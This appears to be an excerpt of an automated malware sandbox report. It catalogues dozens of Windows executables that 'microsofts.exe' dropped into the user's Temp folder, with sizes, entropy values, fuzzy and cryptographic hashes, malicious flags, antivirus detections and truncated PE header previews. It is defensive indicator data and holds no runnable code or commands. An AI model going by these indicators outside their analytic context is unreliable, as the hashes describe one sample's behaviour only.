                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@..................................c..........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
Size (bytes):1142272
Entropy (8bit):5.0328761367329236
Encrypted:false
SSDEEP:12288:G3rdXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:2BsqjnhMgeiCl7G0nehbGZpbD
MD5:2E281A2790F50B7BE42A841FDE952B2D
SHA1:C81FF169B8C4E3347159E03F771CB2400C0DD124
SHA-256:B42B165DBEB3189A5CE6E9A5DA03D7A545C9EFC1D12DECEDFBC421566664F2AE
SHA-512:DD52DED822D61B8EA461A3D5873CA00326E2BBCF66F5055008A0A8B61EC4B1A2EC9C048BB3FE6E00D5ADD845DB5421C313EA492A65F3466ECBB28E3BB6051151
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1242112
Entropy (8bit):5.172664079442345
Encrypted:false
SSDEEP:12288:AYdP/iXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:FdP/isqjnhMgeiCl7G0nehbGZpbD
MD5:7D163A49BBC83ACB2A5FB552826F1615
SHA1:96DBEF3FDAC6D8E3B6ED3E483F735D24688CE351
SHA-256:FC6842619C85BFF48CC03225EBA420BD582A4F781AE5C5DA51E70138535329E3
SHA-512:04BD27FE4CCB8A44028B1100F7F1B31DFE0A176C5D51A851FFF1159E7F073AE0831FCDBAB4DE443EA6448C09758AB1F0DA63C1549EDF9A086114B4DFD28B7274
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.032898076759274
Encrypted:false
SSDEEP:12288:ly51Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:APsqjnhMgeiCl7G0nehbGZpbD
MD5:B81836F50F7510ACC96057B95BFE2DF7
SHA1:C260D5678F7B9547BCFC8E373C631DF7C7B168EB
SHA-256:E0FB053FF381E77CFFB1687C20E1C3B29472D1494FD15FEE9912A95B2D6C1C58
SHA-512:AB574B9569899A9331769DFC7E7BB5A54DF06171C74CA27E94F8071EA16825F9A69E1C0E88C1AC6634A319045DCCF4AD990C8ED9220223B3910F3D5EB4B94368
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.03297043363449
Encrypted:false
SSDEEP:12288:WKltXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:XjsqjnhMgeiCl7G0nehbGZpbD
MD5:071E3B7ED85220C418D74395D50E5A8C
SHA1:B0102ECB3DA80E8E9D0EB1D98C5F56E1DAB9DAB0
SHA-256:B63DF8E7F96DFB55D8C594571955CEBB20F66C785544B4217C08B79C05E09A06
SHA-512:2D2557999B9530DE9D71C96081FB64FDD1FE4248CE3DAEA94BECBE3C3ED4A313D075D815912646AA3D5492485469886517167FF1101B0DC0C88FED36AE17F5B1
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.032970013945113
Encrypted:false
SSDEEP:12288:7iltXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:+jsqjnhMgeiCl7G0nehbGZpbD
MD5:E2BADD23AFAAA7AE67B0829B141D386B
SHA1:C424D6FC9B3734E14AE48B3E71ADBB178A60CE49
SHA-256:4A858BF005B3D049F8831278C123B44102B08FD151ABE3AD31C3820D46904653
SHA-512:E0A853F4686B51DF8D2D3FCB12DBB94126BFC31E1489549778C576B13D2F4B0D7339ABD6BDDD9072C387E1A907A06D60C74AC70AF3A917CFE29594F31A69D763
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.032944841139046
Encrypted:false
SSDEEP:12288:eTmNXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:IgsqjnhMgeiCl7G0nehbGZpbD
MD5:5D4BB306A1BD8324335DD5F5018275C7
SHA1:B79114CC267719ED967CDA03F5E9C6684E5223E7
SHA-256:3899B3B63CF562DBFA8986ECFE39DCB928CB06FB5E206A9C449DA8F18B1CB2C9
SHA-512:719F7B0C9CF0DC623918008D39C325D90A35573D51C36E9F3C011C42281FB193AA0BD59EEF279AE0B28783F6F71F149C50D49EDB883B392B8A47FE74698C7E13
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.033858899174145
Encrypted:false
SSDEEP:12288:qamhXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:9csqjnhMgeiCl7G0nehbGZpbD
MD5:AFED17A3F940506FED83DEBE0CBC266C
SHA1:6BA3826B9B668DAF28B143D5D0ABEFAB04690F35
SHA-256:7A0EFB980BD6759FD108BC94F6B061433842186DE27DC5BABEC965297197C239
SHA-512:95DEFEB1AEA5B5EDD700943AA72E2C71E9638515329BD8F673CD003AE4B7D225BFC3EC2E7FAB207823AE9F8D7F76514198E529C2A8518AEF31E038FE2850EA63
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.032908399634037
Encrypted:false
SSDEEP:12288:WQ51Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:dXsqjnhMgeiCl7G0nehbGZpbD
MD5:F9B909BD519F43D01E6CDA6281550963
SHA1:D9F32DFD566A43DD0AB62C2BA35AB9C598C071D9
SHA-256:A60E2B903AB1DE1AB9C9157D5EA86230D93EE7C775A13438E6E66C86C1CC5199
SHA-512:102E1E493DCE27E4F3565C405EDEAF8A0889364FDE8C56CF04E52FA48A5E1636D48BB65E21219CD0F63C7429702BD1B2853C9E209F6FDE6C51CF4144A82F5EFE
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.03296070622845
Encrypted:false
SSDEEP:12288:kV/tXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:gFsqjnhMgeiCl7G0nehbGZpbD
MD5:ECA9FAFEBA9E875BB032B4908994298B
SHA1:08F7C79AFAF25A8BF3DBE388C10920F6965E17E1
SHA-256:B32C10C36BB93DA33FFDC2387C7BF1F96462DB012FD81B9F589696C2DA547158
SHA-512:B155F95E2B47224151733D8E92C246F483A0DEFC253BFF5693D2CCEE93AA5EBC6CF10E654688BC0B07C15E5AAF601D7E688E8498AC43B67B3DDB4FE221F43A38
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.0328650197374465
Encrypted:false
SSDEEP:12288:bZm9Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:dgsqjnhMgeiCl7G0nehbGZpbD
MD5:02DCE88A873068D07DD78300F7C94B65
SHA1:F2ADE0B2037EBDE8E1ABD6F2D1531C13AE794C80
SHA-256:8891F9790A22120CEFC5AA87FE671E6DA27381520CE1A2EB3EA8A8D19EE96C72
SHA-512:B2BF87D6F28D23A01548F4C97E8967C1FA6B5AEC6FA637410D8E47C547C262059C272079C5341424D6FB156EE1325F2B6F964DF6D53C3AB9CCA2D4766703FC09
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.032905779661063
Encrypted:false
SSDEEP:12288:9eSdXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:sosqjnhMgeiCl7G0nehbGZpbD
MD5:2D50D766283B726703613C1722E60FD0
SHA1:D9347AE262771C71041ED95DEC774A977A3A0489
SHA-256:33EE823CEB8BB7776E860ED74A432943D6F05545AA7F55A17165B28A411BF5E2
SHA-512:6EF35B6033DF7F20BFCEEAE007165F1ED5FE29948C6B81BDB6C84598CE3E1CD8FDA4477A8423087089A0EF721052DAF3720D981EF3E5854BAF9D2358B8185493
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.032976797431892
Encrypted:false
SSDEEP:12288:b5/lXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:9NsqjnhMgeiCl7G0nehbGZpbD
MD5:FF4C123FBEC6BC7E5BD9DC061CCEC75D
SHA1:23BB69CBE7CEB14892F13D2BBC078530C9196734
SHA-256:F65B8D2D3A65C1CFD825BCAF420219C4FDC6BBA6457F03855517CFFE5AE4ABD4
SHA-512:BFB1C5EA88B68A1594496E1ADE3E5B2329A622D14CBA25C5CD403FD9736D62232EF225C09583B84B5E9248B0A6D519EADFB88EF7122A0A88B7C3F99A25407C17
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1202688
Entropy (8bit):5.098046297397434
Encrypted:false
SSDEEP:12288:z7jXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:z7jsqjnhMgeiCl7G0nehbGZpbD
MD5:214C17D89D49B96D7EFC5A14617B383E
SHA1:813B8F59C52B51C01410095526BC21F31F3328DD
SHA-256:EC0A612B0653F623FD46EFB52D34CCAB98CA91BC3E1F5785EA0D26113DFEC7FC
SHA-512:AECE8ECA9DB67AD5F5EAAB890B86DC62ED8DF04EE28E7B009A9356A47203414C03452E6148340E91AE4D158E999427914EC5F50E369E2F80CDEB9DDFCFB510AC
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142784
Entropy (8bit):5.032304867878162
Encrypted:false
SSDEEP:12288:9KQBXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:susqjnhMgeiCl7G0nehbGZpbD
MD5:EC8A7ABF118F7A1D7A3DC9CA2A2ADE25
SHA1:869762F7E280FEBF9A8962A36C183D5CFE093E28
SHA-256:2FA543721DAB8055E7DD05CE30DCBBF115F6EA81B98DACC3B2AD40C7B3D02A6C
SHA-512:76E8C26663461E33F55198F0E62F98DBCB8939D3D2C5C7DE5C818FAA3721DDF5752D577D70D6A7E1A2F8B97C1A0DBA49EFFDB4BB03AA5F39F4E81D9781F7C57F
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1298944
Entropy (8bit):5.24909661212226
Encrypted:false
SSDEEP:24576:4i7l/3roAHsqjnhMgeiCl7G0nehbGZpbD:rl/roAbDmg27RnWGj
MD5:0514E8BAD386398DBB3CB78FDC2657EE
SHA1:56716809FD23491E1DA844C822F935D01C81C1A7
SHA-256:A8721575863C408F9FD66F3C933F5A333121D3EAC248A558D25926FE4FF3999E
SHA-512:E1F76B287E8B528A44D5AA991B571B7241175B8C0A39F6D74A0654B10B2BB46D077A15487EB3A72BBF35F091233BDFC5D285ED4DCFEC1C504A463245A83341ED
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1269248
Entropy (8bit):5.2868782787873005
Encrypted:false
SSDEEP:12288:p5bfQnLXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:pNfQnLsqjnhMgeiCl7G0nehbGZpbD
MD5:62BF2DBE6907BE7A7CBE8FF8B2F17CA6
SHA1:9A68376A94B5427CBBF63D3BB82EEDCE7A4FB189
SHA-256:783DE4DD7EF07146E26613862608626202498638F2F35D5FFF147FFCC6807F19
SHA-512:A975194B64E46D5EAAE2693D2FABADB188DA1FDD7C270318D093D2791F67E89BFE53724E9359615D807991666435973EFB52F5B78005F1FF11A8E1B4A1B3D48A
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1287680
Entropy (8bit):5.303347115520988
Encrypted:false
SSDEEP:12288:0Nmt0LDILi21gXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:LLifsqjnhMgeiCl7G0nehbGZpbD
MD5:418B9A0B9E8B7E69845D69C8C047D863
SHA1:221E619886326D58DBB5AA43B051F252D494595A
SHA-256:C665DBBF005FD86AAB9564781A9279C8345D6C40A6F53635EBA1190D35C89AFB
SHA-512:1F889E3FCA60A29DCE3B7B3310D87297B4BAA9A3CB3F5FC73784B710995215DA8B68716CA2C78591B3F251325DCA98174FFA6341E299F82E5AA6D6E0B5F67549
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1287680
Entropy (8bit):5.303329405718473
Encrypted:false
SSDEEP:12288:kNmt0LDILi21gXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:bLifsqjnhMgeiCl7G0nehbGZpbD
MD5:15E8677B2FB948DA769AA6FC302E3199
SHA1:3A8B2C38D2802E1FE40A6B6B53AD800D705E68C6
SHA-256:6F30638882D407BDB9CB05381BE5A61E5A6D961130D80DE031EA0271AF638F24
SHA-512:565D7D287A87251F40A73876B2C622B33EECA909ACD04DA8DED3857E79E0E5A97467B29D6278FF91AFE6704A7E7D0B8BB6D80F483B90B140AADA3F37858878CE
Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1343488
Entropy (8bit):5.2360300770987305
Encrypted:false
SSDEEP:12288:cjuozQMGNUbTjXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:IffsqjnhMgeiCl7G0nehbGZpbD
MD5:74C867E737A41B7326DEFEF2C82D1C87
SHA1:98E0D8B04D9CC058095E063D1E8951130FE91470
SHA-256:2593293E3EE247CB0455BAE03B45B9F95A3EF2F304F82DA840CBC354B9765C85
SHA-512:0A8AF47A340E66856AEEC39C72A1E93D3513E6330C748DED1FA8B3D852E56A2EBFF59D22D20B4A35B7537AD676DB2B060910492090C4497AB4402E547CE819DD
Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1496064
Entropy (8bit):5.577922916543942
Encrypted:false
SSDEEP:24576:+bUO42i/EasqjnhMgeiCl7G0nehbGZpbD:+JuDmg27RnWGj
MD5:444DF866FF9A780BCD4F7656A6374E26
SHA1:20ABC459B33130DC1D1A6E68C82BFDD23742E6EA
SHA-256:54AF2DA4C23F543639E0719F32A24EEEE4EF5199486B2E4058807FB37E06C796
SHA-512:F6B13350DD750A72D9682D13116F026E9FE9229D4287FDB0FA575B773551FB4B915A867F896EAE83C277D0CC4805B8BC055622E6DEC27E4BB3989D81C906FF7E
Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):52712960
Entropy (8bit):7.961838857216427
Encrypted:false
SSDEEP:1572864:DLjL44lyBc+UN0qRsMjDAY9d5o/paLXzHLe:ricZmsR3Lo/cnLe
MD5:2853DA19D680FF6383DF6EE67686B5F4
SHA1:7166DE0F33F9470CF8032B6B1F1C96BD8C6A45F5
SHA-256:2ED90A74B466E2F39FEC6618570C80ECC7E3A6A3A4519A97FCA4A1D6974C994B
SHA-512:9AB853CFFF838AB4E67C234B3C6EF6F7B728B65C980C19EFC26B53C2744DC79FEF1A88A8E8347A6C68B4B88E40AC218FB3AAB4551173FED1B9132693926E544D
Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1657344
Entropy (8bit):5.635124814803286
Encrypted:false
SSDEEP:24576:QE8DMeflpnIOvYU7sqjnhMgeiCl7G0nehbGZpbD:QtDD9pnIOdDmg27RnWGj
MD5:6B2BD5C37388DD54BD0565BB903C1591
SHA1:6FAE382ECF7391AB7E2C7B2A9CC416B2977BF76D
SHA-256:A15AAFF0F5FE2B813579B3291913B22800DC136A5310B0197B8C6DF700C13A8B
SHA-512:F8CB70E7CED0942A1D04FECDAE91BA55FAF55C533C217BEFA6C783FAFB9FD1526FA3BAC7E09D20B7E6184B1CAFA246C44CA851202E6927D0D3785D944A419119
Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):4364800
Entropy (8bit):6.748476671368598
Encrypted:false
SSDEEP:49152:wB1sstqMHiq8kBfK9a+cOVE/TqEpEepIkRqqUu9wg6KFYso8l8EODmg27RnWGj:6HzorVmr2ZkRpdJYolAD527BWG
MD5:BE3D48CD458A2EEBD2B76ED700A42DFC
SHA1:26DEB4C4A20F794B45263889B12A2A93277481D0
SHA-256:A67FE3B031736E93D0793D8DD9FF877B046523D52044B13EE1B078796D8B62A1
SHA-512:0353809DFE0A2363F3008B5DB33E2A28CC950EAD109B24480638C15B0AE44FDDB375B86E86A3E7FD800C0E074C01C13BB20CDE8180FD46575DC9A4D150894FCC
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1238528
Entropy (8bit):5.1469295714519125
Encrypted:false
SSDEEP:12288:g3w1uVdSEjpXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:gEyTpsqjnhMgeiCl7G0nehbGZpbD
MD5:F7896D2318B44E8BF0AB13B0F3C25F3D
SHA1:FA11D67BC331CB5586DEE278716EF3BDA7825460
SHA-256:B8BFA3E1C942C7AFC8E68AE5CD857A8020A5A0B1141BDACADE8D57395FD49A18
SHA-512:68F8935C5FAB146EB61DD979A06C9110B03585C35A56D284927D6DAD59BDDD8ED65823AE3B38858337DF03435EE35E1C9489F0EB1EFA7B84F35E6A890DDC5A59
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2354176
Entropy (8bit):7.049962599993485
Encrypted:false
SSDEEP:49152:ShDdVrQ95RW0YEHyWQXE/09Val0G0Dmg27RnWGj:ShHYW+HyWKbD527BWG
MD5:AC37DAB395406B7A2E223F34625726DE
SHA1:DB5FAF5F4D426CDDA76D0F4C9997F51D9AB35860
SHA-256:CD220B06304BADD00AF5E3B4CEFF37F7799FD7DCE24C9D5DFDB822276A4FD34B
SHA-512:E4FBA17DC6B560C3FD4BA791854CB3B0F7353EE55FC944749F801AADB176A44B49B0FE766D5D61B628641D6D0EF1469D8C696312DD4EE561E44415BE24DCADA2
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1825280
Entropy (8bit):7.158486131612212
Encrypted:false
SSDEEP:24576:J70E0ZCQZMiU6Rrt9RoctGfmddqsqjnhMgeiCl7G0nehbGZpbD:N0EzQSyRPRoc1SDmg27RnWGj
MD5:47F7C460DD0D82FD87D1B4685F68585A
SHA1:1E16C3185BA4DFE54973A27EC38003BA74026475
SHA-256:4A5F098B62F020D3065A6C8D096121D242D1F3303F785E3287A591852123AC56
SHA-512:3AC9F2A707754D3CDACF6A475BCB3B9C967999289962047AFC98347EAF95B160392726A659FD6EB07DAF3A03722856397630B6B4AA8214E62200D67CCC4B8638
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1847808
Entropy (8bit):7.145472801658465
Encrypted:false
SSDEEP:24576:fiD2VmA1YXwHwlklb8boUuWPg2gVsqjnhMgeiCl7G0nehbGZpbD:aD2VmAyiwIb8boQuDmg27RnWGj
MD5:F7B82C5E3C75E110D966EA925FB02833
SHA1:B0FB4BA996F569B9B1EC43044C7F2D00EFA67B74
SHA-256:913EF2A4D8D6FE49866932B7DA4472DE9BBD02A13E3E5F14E4B93C60A70928F6
SHA-512:FAC9798AB717B6E39CDD5162A850C4FBE7144FB7D9AEEBDBA2E67B165DF2D1F11DC310606FB14838B9243700AAE041365F0A234845BA3AF0CC096918A37248BA
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2853376
Entropy (8bit):6.95073771974498
Encrypted:false
SSDEEP:49152:IfD3zO9ZhBGloizM3HRNr00WDmg27RnWGj:CDaalxzM00WD527BWG
MD5:76CEACA54807C2960E7751EB6AE4B785
SHA1:EAF5375FB9CCF6093F6625B8830475B2F2102CF1
SHA-256:434A041A3E1C611F6C85DC2F74B4B2BC102BBA77E7F57E796DE66809B4D09703
SHA-512:1F578424574C4AA10E91224B6084F6DA9E9C7DC883E573EA24E9543F8B303BDB7EE6DF3F606B8E676F8D281F1D805E9BE002128431774C8FD0FBED8754215110
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):4320256
Entropy (8bit):6.824612930643131
Encrypted:false
SSDEEP:49152:sTaRe7mkn5KLvD5qGVC0080pb4tgLUgGEsLABD5wTQh07yrLMLl9YPhVDmg27RnN:PI72LvkrDpbxJRoIM+D527BWG
MD5:EE375F04CA24A1D04C46C4B095F4BB8F
SHA1:C569AC9B46C2A352D51A344D397B65EA29B805DD
SHA-256:4FD5027E8A6359106558BC79BAE08F255C7DC1898EACCCABBBFBDDD764DBBB47
SHA-512:05BF5E8F5AF14F41A580378153317E97EF16138701316BA85B2AF710FF9813EC9ACB0A2396C03186464F8BB370547A6D098EC7384BD23F1BE3A13A2AD562C9DD
Malicious:true
Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................C.....veB... ..........................................'3......+3.P.....8.x....P6..e..................h.2.T.....................2.(...P"-.@............43.......3. ....................text...E.,.......,................. ..`.rdata..4#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc...x.....8.......6.............@..@.reloc... ...p:.......8.............@...........................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):2062336
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.097236278801967
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:3W9Jml9mmijviMnF+ZxmQWcbLw8V6sqjnhMgeiCl7G0nehbGZpbD:3Wnm5iOMkjmQWkVODmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:F25CF65CAF46E3969B327B77609C907E
                                                                                                                                                                                                                                                                                                          SHA1:CA376038118B103B2B12204D587911B7FC762EF6
                                                                                                                                                                                                                                                                                                          SHA-256:ED95F8EAAB522C377041D1549DFB5EC47A42FC7B97F087340F0972D7261038EF
                                                                                                                                                                                                                                                                                                          SHA-512:30E6F34D3BAC1990CB21E9EDF01F893567215D0FFF1A6F0F2D512A439DB6A5C234864E7059C3FBF46F29B621EEA5D5C7BDBF73836E8924714DAD91415E172513
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......h...4......P..........@.............................. ........... .................................................Z...................H......................8.......................(...`...@...........(...@............................text....g.......h.................. ..`.rdata...).......*...l..............@..@.data...............................@....pdata..H...........................@..@.00cfg..0....P.......H..............@..@.gxfg...p-...`.......J..............@..@.retplne.............x...................tls.................z..............@...CPADinfo8............|..............@..._RDATA..\............~..............@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1801216
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.16634764637907
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:vwNHwoYhua6MtjRO4qbBJTY6mY1uIgssqjnhMgeiCl7G0nehbGZpbD:vwNPdQO7BJTfmEnDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:D560F31B3F8FED536ED9D53E6E4FC319
                                                                                                                                                                                                                                                                                                          SHA1:ED04434D59AA696E7E43FF4B7A753259EF746EFF
                                                                                                                                                                                                                                                                                                          SHA-256:428B2DF6B9EC511AE1FCE89541C36E7075BFA8E00478129B936E7FC19E45A276
                                                                                                                                                                                                                                                                                                          SHA-512:134BC4C6E7F0196B728A6124F15F0C4142A46793ABEE0D14797DBBB99E63593B6F6B5EA143861F7E063818BA89FB89B75A76876ACA65AAE8C4E296F03E5FF98E
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@....................................q..... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1847808
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.1454698197766975
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:riD2VmA1YXwHwlklb8boUuWPg2gVsqjnhMgeiCl7G0nehbGZpbD:GD2VmAyiwIb8boQuDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:AB291A741F47E27775C47CF805720C5D
                                                                                                                                                                                                                                                                                                          SHA1:8059C7253749E268C2C4EE7223DEA79D4D042F65
                                                                                                                                                                                                                                                                                                          SHA-256:ADC95CFD2C98E4214FD3645FA924BFBFB45A05C822AF399EAB51192715189BD6
                                                                                                                                                                                                                                                                                                          SHA-512:D25436AA86273449261E302B1AED794A5D70ADBAF517A52EE1CA9BC8C79940DAFBA219816069CBAE281C3E05FB07967F422F2E6B4B68F5E3F94502D14CAC8467
